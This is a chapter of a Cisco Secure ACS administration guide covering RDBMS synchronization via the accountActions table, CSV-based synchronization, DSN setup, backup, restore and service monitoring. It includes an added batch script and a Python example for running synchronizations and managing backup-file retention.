About RDBMS Synchronization

The RDBMS Synchronization feature provides the ability to update the CiscoSecure user database with information from an ODBC-compliant data source. The ODBC-compliant data source can be the RDBMS database of a third-party application. It can also be an intermediate file or database that a third-party system updates. Regardless of where the file or database resides, Cisco Secure ACS reads the file or database via the ODBC connection. You can also regard RDBMS Synchronization as an API—anything you can configure for a user, group, or device through the Cisco Secure ACS HTML interface, you can alternatively maintain through this feature. RDBMS Synchronization supports addition, modification, and deletion for all data items it can access.

You can configure synchronization to occur on a regular schedule. You can also perform synchronizations manually, updating the CiscoSecure user database on demand.

Synchronization performed by a single Cisco Secure ACS server can update the internal databases of other Cisco Secure ACS servers, so you need only configure RDBMS Synchronization on one Cisco Secure ACS server. Communication between Cisco Secure ACS servers for the purposes of RDBMS Synchronization occurs using an encrypted, Cisco-proprietary protocol.

RDBMS Synchronization Components

The RDBMS Synchronization feature comprises two components:

  • CSDBSync—A dedicated Windows NT/2000 Service that performs automated user and group account management services for Cisco Secure ACS
  • accountActions Table—The data object that holds information used by CSDBSync to update the CiscoSecure user database

About CSDBSync

The CSDBSync service uses an ODBC system data source name (DSN) to access the accountActions table. See Figure 8-2. It looks specifically for a table named "accountActions". Synchronization events fail if CSDBSync cannot access the accountActions table.


Figure 8-2   RDBMS Synchronization


CSDBSync reads each record from the accountActions table and updates the CiscoSecure user database as specified by the action code in the record. For example, a record could instruct CSDBSync to add a user or change a user's password. After CSDBSync processes each record, it deletes the record from the table.

CSDBSync both reads from and writes to (deletes records from) the accountActions table, so the database user account that the system DSN uses must have both read and write privileges on that table.

For more information about CSDBSync or other Windows services used by Cisco Secure ACS, see "Cisco Secure ACS Internal Architecture."

About the accountActions Table

The accountActions table contains a set of rows that define actions CSDBSync is to perform in the CiscoSecure user database. Each row in the accountActions table holds user, user group, or AAA client information. Each row also contains an action field and several other fields. These fields provide CSDBSync with the information it needs to update the CiscoSecure user database. For full details of the accountActions table format and available actions, see "ODBC Import Definitions."

The database containing the accountActions table must support a multi-threaded ODBC driver. This is required to prevent problems in the event that Cisco Secure ACS and the third-party system attempt to access the accountActions table simultaneously.

Cisco Secure ACS includes files to help you create your accountActions table for several common formats. You can find these files on the Cisco Secure ACS server in the following location, assuming a default installation of Cisco Secure ACS:

C:\Program Files\CiscoSecure ACS vx.x\CSDBSync\Databases

The Databases directory contains the following subdirectories:

  • Access—Contains the file CiscoSecure Transactions.mdb.

CiscoSecure Transactions.mdb contains a preconfigured accountActions table. When you install Cisco Secure ACS, the installation routine creates a system DSN named CiscoSecure DBSync. This system DSN is configured to communicate with CiscoSecure Transactions.mdb.


Note    By default, the username and password for the CiscoSecure Transactions.mdb database are set to null. Because CSDBSync applies every row it finds in the accountActions table, anything that can write to this database can add, change, or delete accounts in the CiscoSecure user database. To increase the security of RDBMS synchronizations performed using this database, set a username and password on the CiscoSecure Transactions.mdb database and enter the same credentials in the RDBMS Setup table in Cisco Secure ACS. Change any other processes that access the CiscoSecure Transactions.mdb database to use the new username and password, too.

  • CSV—Contains the files accountactions and schema.ini.

The accountactions file is the accountActions table in a comma-separated value file. The schema.ini file provides the Microsoft ODBC text file driver with the information it needs to access the accountactions file.

  • Oracle 7—Contains the files accountActions.sql and testData.sql.

The accountActions.sql file contains the Oracle 7 SQL procedure needed to generate an accountActions table. The testData.sql file contains Oracle 7 SQL procedures for updating the accountActions table with sample transactions that CSDBSync can process.

  • Oracle 8—Contains the files accountActions.sql and testData.sql.

The accountActions.sql file contains the Oracle 8 SQL procedure needed to generate an accountActions table. The testData.sql file contains Oracle 8 SQL procedures for updating the accountActions table with sample transactions that CSDBSync can process.

  • SQL Server 6.5—Contains the files accountActions.sql and testData.sql.

The accountActions.sql file contains the Microsoft SQL Server 6.5 SQL procedure needed to generate an accountActions table. The testData.sql file contains Microsoft SQL Server 6.5 SQL procedures for updating the accountActions table with sample transactions that CSDBSync can process.

Cisco Secure ACS Database Recovery Using the accountActions Table

Because the RDBMS Synchronization feature deletes each record from the accountActions table after processing it, the accountActions table can be considered a transaction queue. The RDBMS Synchronization feature does not maintain a transaction log or audit trail. If a log is required, the external system that adds records to the accountActions table must create it. Unless the external system can recreate the entire transaction history in the accountActions table, we recommend that you construct a transaction log file for recovery purposes. To do this, create a second table that is stored in a safe location and backed up on a regular basis. In that second table, mirror all the additions and updates to records in the accountActions table.

If the database is large, it is not practical to recreate the CiscoSecure user database by replaying the transaction log for the entire history of the system. Instead, create regular backups of the CiscoSecure user database and replay the transaction logs from the time of most recent backup to bring the CiscoSecure user database back in synchronization with the third-party system. For information on creating backup files, see the "Cisco Secure ACS Backup" section.

Replaying transaction logs that slightly predate the checkpoint does not damage the CiscoSecure user database, although some transactions might be invalid and reported as errors. As long as the entire transaction log is replayed, the CiscoSecure user database is consistent with the external RDBMS application's database.

Reports and Event (Error) Handling

The CSDBSync service provides event and error logging. For more information about the RDBMS Synchronization log, see the "RDBMS Synchronization Log" section. For more information about the CSDBSync service log, see the "Service Logs" section.

During manual synchronizations, Cisco Secure ACS provides visual alerts to notify you of problems that occurred during synchronization.

Preparing to Use RDBMS Synchronization

Synchronizing the CiscoSecure user database using data from the accountActions table requires that you complete several significant steps external to Cisco Secure ACS before configuring the RDBMS Synchronization feature within Cisco Secure ACS. If you are planning to use a CSV file as your accountActions table, also see the "Considerations for Using CSV-Based Synchronization" section.

To prepare to use RDBMS Synchronization, follow these steps:


Step 1   Determine where you want to create the accountActions table and in what format. For more information about the accountActions table, see the "About the accountActions Table" section. For details on the format and content of the accountActions table, see "ODBC Import Definitions."

Step 2   Create your accountActions table.

Step 3   Configure your third-party system to generate records and update the accountActions table with them. This will most likely involve creating stored procedures that write to the accountActions table at a triggered event; however, the mechanism for maintaining your accountActions table is unique to your implementation. If the third-party system you are using to update the accountActions table is a commercial product, for assistance, refer to the documentation supplied by your third-party system vendor.

For information about the format and content of the accountActions table, see the "ODBC Import Definitions."

Step 4   Validate your third-party system to ensure that it updates the accountActions table properly. Rows generated in the accountActions table must be valid. For details on the format and content of the accountActions table, see "ODBC Import Definitions."


Note    After testing that the third-party system updates the accountActions table properly, discontinue updating the accountActions table until after you have completed Step 5 and Step 6 below.

Step 5   Set up a system DSN on the Cisco Secure ACS server. For steps, see the "Configuring a System Data Source Name for RDBMS Synchronization" section.

Step 6   Schedule RDBMS synchronization in Cisco Secure ACS. For steps, see the "Scheduling RDBMS Synchronization" section.

Step 7   Configure your third-party system to begin updating the accountActions table with information to be imported into the CiscoSecure user database.

Step 8   Confirm that RDBMS synchronization is operating properly by monitoring the RDBMS Synchronization report in the Reports and Activity section. For more information about the RDBMS Synchronization log, see the "RDBMS Synchronization Log" section.

Also, monitor the CSDBSync service log. For more information about the CSDBSync service log, see the "Service Logs" section.





Considerations for Using CSV-Based Synchronization

The behavior of the Microsoft ODBC driver for text files creates significant additional considerations if you are planning to use a CSV-based accountActions table. The Microsoft ODBC driver for text files always operates in a read-only mode. It cannot delete records from a CSV accountActions table. Because of this, synchronization events initiated or scheduled in the HTML interface never release the CSV file, so the updates to the accountActions table from your third-party system fail.

The solution is to initiate synchronization events from a script, such as a DOS batch file. In the script, RDBMS synchronization is initiated with the CSDBSync -run command.

Assuming a default installation, CSDBSync.exe is installed at:

C:\Program Files\CiscoSecure ACS vx.x\CSDBSync

After you have written a script that runs the CSDBSync -run command, you can schedule synchronization events using the Windows at command. For information about the at command, refer to your Microsoft Windows documentation.

Also, due to limitations of the Microsoft ODBC text file driver, using the CSV format requires a change to the accountactions CSV file shipped with Cisco Secure ACS and to Cisco Secure ACS configuration. For more information, see the "Preparing for CSV-Based Synchronization" section.

Preparing for CSV-Based Synchronization

If you want to use a CSV file for your accountActions table, some additional configuration is necessary. This is because the Microsoft ODBC CSV driver cannot access the accountActions table unless the file has a .csv file extension.

To prepare for RDBMS synchronization using a CSV file, follow these steps:


Step 1   Rename the accountactions CSV file installed on your Cisco Secure ACS server to accountactions.csv.

Assuming a default installation of Cisco Secure ACS, the accountactions file is at the following location:

C:\Program Files\CiscoSecure ACS vx.x\CSDBSync\Databases\CSV

Step 2   Edit the Windows registry:

a. Access the following key:

HKEY_LOCAL_MACHINE\SOFTWARE\Cisco\CiscoAAAvx.x\CSDBSync

b. Edit the OdbcUpdateTable value from AccountActions to accountactions.csv.

c. Save your changes to the registry.

Step 3   At a DOS prompt, follow these steps:

a. Type:

net stop CSDBSync

and press Enter.

b. Type:

net start CSDBSync

and press Enter.

Result: The Microsoft ODBC CSV driver can now access the accountActions CSV file properly.
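The batch file below is an added example; it is not part of Cisco Secure ACS or of this guide. It shows one way to do what the two preceding sections ask for: run a CSV-based synchronization from a script with CSDBSync -run, and keep the processed rows as the transaction log that the "Cisco Secure ACS Database Recovery Using the accountActions Table" section says the external system must provide, because the Microsoft text driver cannot delete rows. The directory D:\acs-feed, the staging file accountactions.pending, the run counter, the requirement that the third-party system write its rows to the staging file (and never to the live accountactions.csv), a nonzero exit code from CSDBSync -run on failure, and Windows 2000 cmd.exe are all assumptions of the example; the Cisco Secure ACS paths are the default v3.0 installation paths given earlier in this chapter. It also assumes that Synchronization Scheduling on the RDBMS Synchronization Setup page is set to Manually, so that the CSDBSync service does not open the CSV file on its own schedule.

```batch
@echo off
rem acs-csv-sync.cmd
rem Added example, not part of Cisco Secure ACS or of this guide.
rem Drives one CSV-based RDBMS synchronization run from a batch file with
rem "CSDBSync -run", then archives the processed rows as a replayable
rem transaction log, which the RDBMS Synchronization feature does not keep.
rem
rem Assumptions made by this example (not taken from the guide):
rem  - the third-party system writes its new accountActions rows to the
rem    staging file (FEED below), written under a temporary name and renamed
rem    when complete, never to the live accountactions.csv, so the two sides
rem    never have the same file open at once;
rem  - the CSV files contain data rows only (no header line), so a processed
rem    file can be archived whole and fed back in after a restore;
rem  - CSDBSync -run sets a nonzero exit code when the run fails;
rem  - Windows 2000 cmd.exe (DATE and TIME variables, exit /b).

setlocal
set ACSDIR=C:\Program Files\CiscoSecure ACS v3.0
set LIVE=%ACSDIR%\CSDBSync\Databases\CSV\accountactions.csv
set FEEDDIR=D:\acs-feed
set FEED=%FEEDDIR%\accountactions.pending
set LOGDIR=%FEEDDIR%\log
set SEQFILE=%LOGDIR%\run.seq
set SYNCLOG=%LOGDIR%\sync.log
set SEQ=0

if not exist "%LOGDIR%" mkdir "%LOGDIR%"

rem 1. Nothing staged by the third-party system: record that and stop.
if not exist "%FEED%" (
    >>"%SYNCLOG%" echo %DATE% %TIME% nothing pending, skipped
    goto :done
)

rem 2. Next run number.  Every archived batch gets a unique, ordered name
rem    that can be lined up against the ACS Backup files when replaying.
if exist "%SEQFILE%" for /f "usebackq" %%s in ("%SEQFILE%") do set SEQ=%%s
set /a SEQ=%SEQ%+1
>"%SEQFILE%" echo %SEQ%

rem 3. A live file left over from an earlier failed run holds rows that were
rem    never applied; do not overwrite it, stop and let someone look.
if exist "%LIVE%" (
    >>"%SYNCLOG%" echo %DATE% %TIME% run %SEQ%: stale accountactions.csv present, not replaced
    goto :fail
)
move "%FEED%" "%LIVE%" || goto :fail

rem 4. Run the synchronization.  CSDBSync reads the live file through the
rem    system DSN selected on the RDBMS Synchronization Setup page; the
rem    Microsoft text driver cannot delete the rows, so the file is unchanged
rem    when the run returns.
"%ACSDIR%\CSDBSync\CSDBSync.exe" -run
if errorlevel 1 (
    >>"%SYNCLOG%" echo %DATE% %TIME% run %SEQ%: CSDBSync -run failed, rows left in accountactions.csv
    goto :fail
)

rem 5. Archive the processed rows.  This move is what empties the queue, and
rem    the archived copy is the transaction log to replay (from the first run
rem    after the most recent backup) following an ACS System Restore.
move "%LIVE%" "%LOGDIR%\accountactions.%SEQ%.csv" || goto :fail
>>"%SYNCLOG%" echo %DATE% %TIME% run %SEQ%: applied and archived as accountactions.%SEQ%.csv
goto :done

:fail
>>"%SYNCLOG%" echo %DATE% %TIME% run %SEQ%: FAILED, check the RDBMS Synchronization report before the next run
endlocal
exit /b 1

:done
endlocal
exit /b 0
```

Schedule the script with the at command, for example at 02:00 /every:M,T,W,Th,F "D:\acs-feed\acs-csv-sync.cmd". Jobs submitted with at run under the Schedule service, which runs as the local system account on Windows NT/2000, so restrict write access to the script, the staging directory, and the archive directory: anyone who can write to the staging file can queue account changes that CSDBSync will apply to the CiscoSecure user database.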





Configuring a System Data Source Name for RDBMS Synchronization

On the Cisco Secure ACS server, a system DSN must exist for Cisco Secure ACS to access the accountActions table. If you plan to use the CiscoSecure Transactions.mdb Microsoft Access database provided with Cisco Secure ACS, you can use the CiscoSecure DBSync system DSN rather than creating one.

For more information about the CiscoSecure Transactions.mdb file, see the "About the accountActions Table" section.

To create a system DSN for use with RDBMS synchronization, follow these steps:


Step 1   In Windows Control Panel, double-click the ODBC Data Sources icon.

Step 2   In the ODBC Data Source Administrator window, click the System DSN tab.

Step 3   Click Add.

Step 4   Select the driver you need to use with your new DSN, and then click Finish.

Result: A dialog box displays fields requiring information specific to the ODBC driver you selected.

Step 5   In the Data Source Name box, type a descriptive name for the DSN.

Step 6   Complete the other fields required by the ODBC driver you selected. These fields may include information such as the IP address of the server on which the ODBC-compliant database runs.

Step 7   Click OK.

Result: The name you assigned to the DSN appears in the System Data Sources list.

Step 8   Close the ODBC window and Windows Control Panel.

Result: The System DSN to be used by Cisco Secure ACS to access your accountActions table is created on your Cisco Secure ACS server.





RDBMS Synchronization Options

The RDBMS Synchronization Setup page, available from System Configuration, provides control of the following items:

RDBMS Setup Options

The RDBMS Synchronization feature provides the following RDBMS setup options:

  • Data Source—Specifies which of the system DSNs on the Cisco Secure ACS server is used to access the accountActions table
  • Username—Specifies the username Cisco Secure ACS should use to access the database that contains the accountActions table

Note    The database user account specified by the username must have sufficient privileges to read and write to the accountActions table.

  • Password—Specifies the password Cisco Secure ACS uses to access the database that contains the accountActions table

Synchronization Scheduling Options

The RDBMS Synchronization feature provides the following scheduling options:

  • Manually—Cisco Secure ACS does not perform automatic RDBMS synchronization.
  • Every X minutes—Cisco Secure ACS performs synchronization on a set frequency. The unit of measurement is minutes, with a default update frequency of 60 minutes.
  • At specific times...—Cisco Secure ACS performs synchronization at the times selected in the day and hour graph. The minimum resolution is one hour, and the synchronization takes place on the hour selected.

Synchronization Partners Options

The RDBMS Synchronization feature provides the following synchronization partners options:

  • AAA Server—This list represents the AAA servers configured in the AAA Servers table in Network Configuration for which the Cisco Secure ACS server does not perform RDBMS synchronization.
  • Synchronize—This list represents the AAA servers configured in the AAA Servers table in Network Configuration for which the Cisco Secure ACS server does perform RDBMS synchronization.

For more information about the AAA Servers table in Network Configuration, see the "AAA Server Configuration" section.

Performing RDBMS Synchronization Immediately

You can manually start an RDBMS synchronization event.

To perform manual RDBMS synchronization, follow these steps:


Step 1   In the navigation bar, click System Configuration.

Step 2   Click RDBMS Synchronization.


Note    If this feature does not appear, click Interface Configuration, click Advanced Options, and then select the RDBMS Synchronization check box.

Result: The RDBMS Synchronization Setup page appears.

Step 3   To specify options in the RDBMS Setup table, follow these steps:


Note    For more information about RDBMS setup, see the "RDBMS Setup Options" section.

a. From the Data Source list, select the system DSN you configured to communicate with the database that contains your accountActions table.

For more information about configuring a system DSN for use with RDBMS Synchronization, see the "Configuring a System Data Source Name for RDBMS Synchronization" section.

b. In the Username box, type the username for a database user account that has read/write access to the accountActions table.

c. In the Password box, type the password for the username specified in the previous step.

Result: Cisco Secure ACS has the information necessary to access the accountActions table.


Note   It is not necessary to select Manually under Synchronization Scheduling. For more information, see the "Disabling Scheduled RDBMS Synchronizations" section.

Step 4   For each Cisco Secure ACS that you want this Cisco Secure ACS server to update with data from the accountActions table, select the Cisco Secure ACS server in the AAA Servers list, and then click —> (right arrow button).

Result: The selected Cisco Secure ACS server appears in the Synchronize list.

Step 5   To remove Cisco Secure ACS servers from Synchronize list, select the Cisco Secure ACS server in the Synchronize list, and then click <— (left arrow button).

Result: The selected Cisco Secure ACS server appears in the AAA Servers list.

Step 6   At the bottom of the browser window, click Synchronize Now.

Result: Cisco Secure ACS immediately begins a synchronization event. To check on the status of the synchronization, view the RDBMS Synchronization report in Reports and Activity.





Scheduling RDBMS Synchronization

You can schedule when a Cisco Secure ACS server performs RDBMS synchronization.

To schedule when a Cisco Secure ACS server performs RDBMS synchronization, follow these steps:


Step 1   In the navigation bar, click System Configuration.

Step 2   Click RDBMS Synchronization.


Note    If this feature does not appear, click Interface Configuration, click Advanced Options, and then select the RDBMS Synchronization check box.

Result: The RDBMS Synchronization Setup page appears.

Step 3   To specify options in the RDBMS Setup table, follow these steps:


Note    For more information about RDBMS setup, see the "RDBMS Setup Options" section.

a. From the Data Source list, select the system DSN you configured to communicate with the database that contains your accountActions table.

For more information about configuring a system DSN for use with RDBMS Synchronization, see the "Configuring a System Data Source Name for RDBMS Synchronization" section.

b. In the Username box, type the username for a database user account that has read/write access to the accountActions table.

c. In the Password box, type the password for the username specified in the previous step.

Step 4   To have this Cisco Secure ACS server perform RDBMS synchronization at regular intervals, under Synchronization Scheduling, select the Every X minutes option and in the X box type the length of the interval at which Cisco Secure ACS should perform synchronization.

Step 5   To schedule times at which this Cisco Secure ACS server performs RDBMS synchronization, follow these steps:

a. Under Synchronization Scheduling, select the At specific times option.

b. In the day and hour graph, click the times at which you want Cisco Secure ACS to perform synchronization.


Tip Clicking times of day on the graph selects those times; clicking again clears them. At any time you can click Clear All to clear all hours, or you can click Set All to select all hours.

Step 6   For each Cisco Secure ACS server you want to synchronize with data from the accountActions table, follow these steps:


Note    For more information about synchronization targets, see the "Synchronization Partners Options" section.

a. In the Synchronization Partners table, from the AAA Servers list, select the name of a Cisco Secure ACS server that you want this Cisco Secure ACS server to update with data from the accountActions table.


Note    The Cisco Secure ACS servers available in the AAA Servers list are determined by the AAA Servers table in Network Configuration, with the addition of the name of the current Cisco Secure ACS server. For more information about the AAA Servers table, see the "AAA Server Configuration" section.

b. Click —> (right arrow button).

Result: The selected Cisco Secure ACS server moves to the Synchronize list.


Note   At least one Cisco Secure ACS server must be in the Synchronize list. This includes the server on which you are configuring RDBMS Synchronization. RDBMS Synchronization does not automatically include the current server's internal database.

Step 7   Click Submit.

Result: Cisco Secure ACS saves the RDBMS synchronization schedule you created.





Disabling Scheduled RDBMS Synchronizations

You can disable scheduled RDBMS synchronization events without losing the schedule itself. This allows you to cease scheduled synchronizations temporarily and later resume them without having to re-enter the schedule information.

To disable scheduled RDBMS synchronizations, follow these steps:


Step 1   In the navigation bar, click System Configuration.

Step 2   Click RDBMS Synchronization.

Result: The RDBMS Synchronization Setup page appears.

Step 3   Under Synchronization Scheduling, select the Manually option.

Step 4   Click Submit.

Result: Cisco Secure ACS does not perform scheduled RDBMS synchronizations.





Cisco Secure ACS Backup

This section provides information about the Cisco Secure ACS Backup feature, including procedures for implementing this feature. This section contains the following topics:

About Cisco Secure ACS Backup

The ACS Backup process backs up your Cisco Secure ACS system information to a file on the local hard drive. You can manually back up the Cisco Secure ACS system. You can also establish automated backups that occur at regular intervals or at selected days of the week and times. Maintaining backup files can minimize downtime if system information becomes corrupt or is misconfigured. We recommend copying the files to another system's hard drive in case the hardware fails on the primary system.

For information about using a backup file to restore Cisco Secure ACS, see the "Cisco Secure ACS System Restore" section.

Backup File Locations

The default directory for backup files is the following:

drive:\path\CSAuth\System Backups

where drive is the local drive where you installed Cisco Secure ACS and path is the path from the root of drive to the Cisco Secure ACS directory. For example, if you installed Cisco Secure ACS Version 3.0 in the default location, the default backup location would be:

c:\Program Files\CiscoSecure ACS v3.0\CSAuth\System Backups

The filename given to a backup is determined by Cisco Secure ACS. For more information about filenames assigned to backup files generated by Cisco Secure ACS, see the "Backup File Names and Locations" section.

Directory Management

You can configure the number of backup files to keep and the number of days after which backup files are deleted. The more complex your configuration and the more often you back up the system, the more diligent we recommend you be about clearing out old databases from the Cisco Secure ACS server hard drive.

Components Backed Up

The ACS System Backup utility backs up the CiscoSecure user database and the information in the Windows Registry that is relevant to Cisco Secure ACS. The user database backup includes all user information, such as usernames, passwords, and other authentication information, including server certificates and the certificate trust list. The Windows Registry information includes any system information that is stored in the Windows Registry, such as NDG information, AAA client configuration, and administrator accounts. Because a backup file therefore contains credentials and certificates, protect the backup directory and any copies you make as carefully as the Cisco Secure ACS server itself.

Reports of Cisco Secure ACS Backups

When a system backup takes place, whether it was manually generated or scheduled, the event is logged in the Administration Audit report and the ACS Backup and Restore report. You can view recent reports in the Reports and Activity section of Cisco Secure ACS.

For more information about Cisco Secure ACS reports, see "Working with Logging and Reports."

Performing a Manual Cisco Secure ACS Backup

You can back up Cisco Secure ACS whenever you want, without scheduling the backup.

To perform an immediate backup of Cisco Secure ACS, follow these steps:


Step 1   In the navigation bar, click System Configuration.

Step 2   Click ACS Backup.

Result: The ACS System Backup Setup page appears.

Step 3   In the Directory box under Backup Location, type the drive and path to the directory on a local hard drive where you want the backup file to be written.

Step 4   Click Backup Now.

Result: Cisco Secure ACS immediately begins a backup.





Scheduling Cisco Secure ACS Backups

You can schedule Cisco Secure ACS backups to occur at regular intervals or at selected days of the week and times.

To schedule the times at which Cisco Secure ACS performs a backup, follow these steps:


Step 1   In the navigation bar, click System Configuration.

Step 2   Click ACS Backup.

Result: The ACS System Backup Setup page appears.

Step 3   To schedule backups at regular intervals, under ACS Backup Scheduling, select the Every X minutes option and in the X box type the length of the interval at which Cisco Secure ACS should perform backups.


Note    Because Cisco Secure ACS is momentarily shut down during backup, if the backup interval is set too low, users might be unable to authenticate.

Step 4   To schedule backups at specific times, follow these steps:

a. Under ACS Backup Scheduling, select the At specific times option.

b. In the day and hour graph, click the times at which you want Cisco Secure ACS to perform a backup.


Tip Clicking times of day on the graph selects those times; clicking again clears them. At any time you can click Clear All to clear all hours, or you can click Set All to select all hours.

Step 5   To change the location where Cisco Secure ACS writes backup files, type the drive letter and path in the Directory box.

Step 6   To manage which backup files Cisco Secure ACS keeps, follow these steps:

a. Select the Manage Directory check box.

b. To limit the number of backup files Cisco Secure ACS retains, select the Keep only the last X files option and type the number of files you want Cisco Secure ACS to retain in the X box.

c. To limit how old backup files retained by Cisco Secure ACS can be, select the Delete files older than X days option and type the number of days for which Cisco Secure ACS should retain a backup file before deleting it.

Step 7   Click Submit.

Result: Cisco Secure ACS implements the backup schedule you configured.





Disabling Scheduled Cisco Secure ACS Backups

You can disable scheduled Cisco Secure ACS backups without losing the schedule itself. This allows you to cease scheduled backups temporarily and later resume them without having to re-enter the schedule information.

To disable a scheduled backup, follow these steps:


Step 1   In the navigation bar, click System Configuration.

Step 2   Click ACS Backup.

Result: The ACS System Backup Setup page appears.

Step 3   Under ACS Backup Scheduling, select the Manual option.

Step 4   Click Submit.

Result: Cisco Secure ACS does not continue any scheduled backups. You can still perform manual backups as needed.





Cisco Secure ACS System Restore

This section provides information about the Cisco Secure ACS System Restore feature, including procedures for restoring your Cisco Secure ACS server from a backup file. This section contains the following topics:

About Cisco Secure ACS System Restore

The ACS System Restore feature enables you to restore your system configuration from backup files generated by the ACS Backup feature. This feature helps minimize downtime if Cisco Secure ACS system information becomes corrupted or is misconfigured.

The ACS System Restore feature only works with backup files generated by a Cisco Secure ACS server running an identical release of Cisco Secure ACS, including patch level.

Backup File Names and Locations

The ACS System Restore feature restores the Cisco Secure ACS user database and Cisco Secure ACS Windows Registry information from a file that was created by the ACS Backup feature. Cisco Secure ACS writes backup files only on the local hard drive. You can restore from any backup file you select. For example, you can restore from the latest backup file, or if you suspect that the latest backup was incorrect, you can select an earlier backup file to restore from.

The backup directory is selected when you schedule backups or perform a manual backup. The default directory for backup files is the following:

drive:\path\CSAuth\System Backups

where drive is the local drive where you installed Cisco Secure ACS and path is the path from the root of drive to the Cisco Secure ACS directory. For example, if you installed Cisco Secure ACS Version 3.0 in the default location, the default backup location would be:

c:\Program Files\CiscoSecure ACS v3.0\CSAuth\System Backups

Cisco Secure ACS creates backup files using the date and time format:

dd-mmm-yyyy hh-nn-ss.dmp

where:

  • dd is the date the backup started
  • mmm is the month, abbreviated in alphabetic characters
  • yyyy is the year
  • hh is the hour, in 24-hour format
  • nn is the minute
  • ss is the second at which the backup started

For example, if Cisco Secure ACS started a backup on October 13, 1999, 11:41:35 a.m., Cisco Secure ACS would generate a backup file named:

13-Oct-1999 11-41-35.dmp

If you are not sure of the location of the latest backup file, check your scheduled backup configuration on the ACS Backup page.
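As an added example (not Cisco's code), the following Python parses file names in the dd-mmm-yyyy hh-nn-ss.dmp format above, picks the latest backup, and applies the two Manage Directory retention options from the ACS Backup page (Keep only the last X files, Delete files older than X days). The directory listing and the reference time are constructed sample data; files whose names are not in the backup format are deliberately left alone.

```python
"""Added example, not Cisco's code: parse ACS backup file names of the form
'dd-mmm-yyyy hh-nn-ss.dmp' and apply the Manage Directory retention options
('Keep only the last X files', 'Delete files older than X days') to a
directory listing. Listing and reference time below are constructed."""
from datetime import datetime, timedelta

BACKUP_SUFFIX = ".dmp"
# strptime pattern for "13-Oct-1999 11-41-35"; %b matches the English
# three-letter month abbreviation that ACS writes into the file name
NAME_FORMAT = "%d-%b-%Y %H-%M-%S"

# Constructed sample directory listing (not real backups)
SAMPLE_LISTING = [
    "13-Oct-1999 11-41-35.dmp",
    "14-Oct-1999 02-00-00.dmp",
    "20-Oct-1999 02-00-00.dmp",
    "21-Oct-1999 02-00-00.dmp",
    "readme.txt",
]
SAMPLE_NOW = datetime(1999, 10, 21, 12, 0, 0)  # constructed "current" time


def parse_backup_name(name):
    """Return the datetime at which the backup started, or None when the
    name is not in the ACS backup format (such files are never touched)."""
    if not name.endswith(BACKUP_SUFFIX):
        return None
    try:
        return datetime.strptime(name[: -len(BACKUP_SUFFIX)], NAME_FORMAT)
    except ValueError:  # wrong layout, bad month, day 32, ...
        return None


def backups_newest_first(names):
    """Pair each well-formed backup name with its start time, newest first."""
    dated = []
    for n in names:
        ts = parse_backup_name(n)
        if ts is not None:
            dated.append((ts, n))
    dated.sort(reverse=True)
    return dated


def latest_backup(names):
    """The file you would normally pick on the ACS Restore page."""
    dated = backups_newest_first(names)
    return dated[0][1] if dated else None


def apply_retention(names, now, keep_last=None, max_age_days=None):
    """Return (kept, deleted) file-name lists. keep_last and max_age_days
    mirror the two Manage Directory options; None disables an option."""
    kept, deleted = [], []
    for index, (ts, n) in enumerate(backups_newest_first(names)):
        too_many = keep_last is not None and index >= keep_last
        too_old = (max_age_days is not None
                   and now - ts > timedelta(days=max_age_days))
        (deleted if too_many or too_old else kept).append(n)
    return kept, deleted


if __name__ == "__main__":
    print("latest:", latest_backup(SAMPLE_LISTING))
    kept, deleted = apply_retention(SAMPLE_LISTING, SAMPLE_NOW,
                                    keep_last=3, max_age_days=7)
    print("keep:", kept)
    print("delete:", deleted)
```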

Components Restored

You can select the components to restore: the user and group databases, the system configuration, or both.

Reports of Cisco Secure ACS Restorations

When a Cisco Secure ACS system restoration takes place, the event is logged in the Administration Audit report and the ACS Backup and Restore report. You can view recent reports in the Reports and Activity section of Cisco Secure ACS.

For more information about Cisco Secure ACS reports, see "Working with Logging and Reports."

Restoring Cisco Secure ACS from a Backup File

You can perform a system restoration of Cisco Secure ACS whenever needed.


Note   Using the Cisco Secure ACS System Restore feature restarts all Cisco Secure ACS services and logs out all administrators.

To restore Cisco Secure ACS from a backup file generated by the Cisco Secure ACS Backup feature, follow these steps:


Step 1   In the navigation bar, click System Configuration.

Step 2   Click ACS Restore.

Result: The ACS System Restore Setup page appears.

The Directory box displays the drive and path to the backup directory most recently configured in the Directory box on the ACS Backup page.

Beneath the Directory box, Cisco Secure ACS displays the backup files in the current backup directory. If no backup files exist, <No Matching Files> appears in place of file names.

Step 3   To change the backup directory, type the new drive and path to the backup directory in the Directory box, and then click OK.

Result: Cisco Secure ACS displays the backup files, if any, in the backup directory you specified.

Step 4   In the list below the Directory box, select the backup file you want to use to restore Cisco Secure ACS.

Step 5   To restore user and group database information, select the User and Group Database check box.

Step 6   To restore system configuration information, select the CiscoSecure ACS System Configuration check box.

Step 7   Click Restore Now.

Result: Cisco Secure ACS displays a confirmation dialog box indicating that performing the restoration will restart Cisco Secure ACS services and log out all administrators.

Step 8   To continue with the restoration, click OK.

Result: Cisco Secure ACS restores the system components specified using the backup file you selected. The restoration should require several minutes to complete, depending on which components you selected to restore and the size of your database.

When the restoration is complete, you can log in again to Cisco Secure ACS.





Cisco Secure ACS Active Service Management

ACS Active Service Management is an application-specific service monitoring tool that is tightly integrated with ACS. The ACS Active Service Management comprises two features:

System Monitoring

Cisco Secure ACS system monitoring enables you to determine how often Cisco Secure ACS tests its authentication and accounting processes, and what automated actions it takes should tests detect a failure of these processes.

System Monitoring Options

You have the following options for configuring system monitoring:

  • Test login process every X minutes—Controls whether or not Cisco Secure ACS tests its login process. The value in the X box defines, in minutes, how often Cisco Secure ACS tests its login process.

When this option is enabled, at the interval defined, Cisco Secure ACS tests authentication and accounting. If Cisco Secure ACS detects a failure, it restarts the failed service and retests authentication and accounting. If the second test fails, Cisco Secure ACS performs the action identified in the on failure list. If, after the failure action is performed, testing still fails, Cisco Secure ACS performs event logging. For more information about event logging, see the "Setting Up Event Logging" section.

  • on failure—Specifies what action Cisco Secure ACS takes if it detects that its login process failed. This list contains several built-in actions and reflects custom actions that you define. The items beginning with asterisks (*) are built-in actions.
    • *Restart All—Restart all Cisco Secure ACS services.
    • *Restart RADIUS/TACACS+—Restart only the RADIUS and TACACS+ services.
    • *Reboot—Reboot the Cisco Secure ACS server.
    • Custom actions—You can define other actions for Cisco Secure ACS to take upon failure of the login process. Cisco Secure ACS can execute a batch file or executable upon the failure of the login process. To make a batch or executable file available in the on failure list, place the file in the following directory:
drive:\path\CSMon\Scripts

where drive is the local drive where you installed Cisco Secure ACS and path is the path from the root of drive to the Cisco Secure ACS directory.

    • Take No Action—Leave Cisco Secure ACS operating as is.
